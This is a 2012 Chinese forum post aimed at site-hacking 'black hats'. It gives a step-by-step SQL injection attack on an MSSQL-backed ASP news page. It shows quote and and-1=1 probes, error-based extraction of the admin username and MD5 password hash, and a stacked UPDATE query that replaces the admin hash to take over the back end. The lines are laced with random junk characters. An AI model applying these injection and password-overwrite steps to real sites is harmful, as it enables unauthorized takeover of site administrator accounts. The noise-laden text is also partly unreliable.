经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。- l; [6 h3 \9 | q/ x2 l" l
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL): D5 Q# K. I' i& v
测试如下:2 o. F) Z7 _; l- {- }& F ~
http://www.tmdsb.com/news.asp?id=121 G% S7 f* A) ^) y- }3 c
在地址后输入单引号,显示/ @" f' O% Y) G4 a' ^* C5 Q' T
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
* z7 V* d( [9 ?: o0 v, _1 i字符串 ’’’ 之前有未闭合的引号
3 T0 B4 K- A+ r* `& g# }" q( F/news/tmdws.asp,行630 q* n" m8 ?& k* g) O8 U
说明没有过滤单引号且数据库是MSSQL.% Q5 Z: h- q ?7 F( b
and 1=1正常。and 1=2出错。肯定存在注入/ q) S3 x! Z( d! ]" `
接着输入0 ]& f' | V0 Q, y! J: B" y
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
2 H& w& S* ~8 T得到帐号为:admin3 W, O# g% h0 e9 h
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)' w! g. O9 K7 L* D+ J( ?9 F
得到密码为:a4716077c2ba075c1 N( ]0 n1 m ?
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433, x% I9 c1 U! e- c) L7 y
命令如下 :
! F! R V5 u! L4 p/ B6 S7 i2 H;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
. s! _& c7 }3 ~: z. m5 {2 \+ N2 C2 u6 i这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41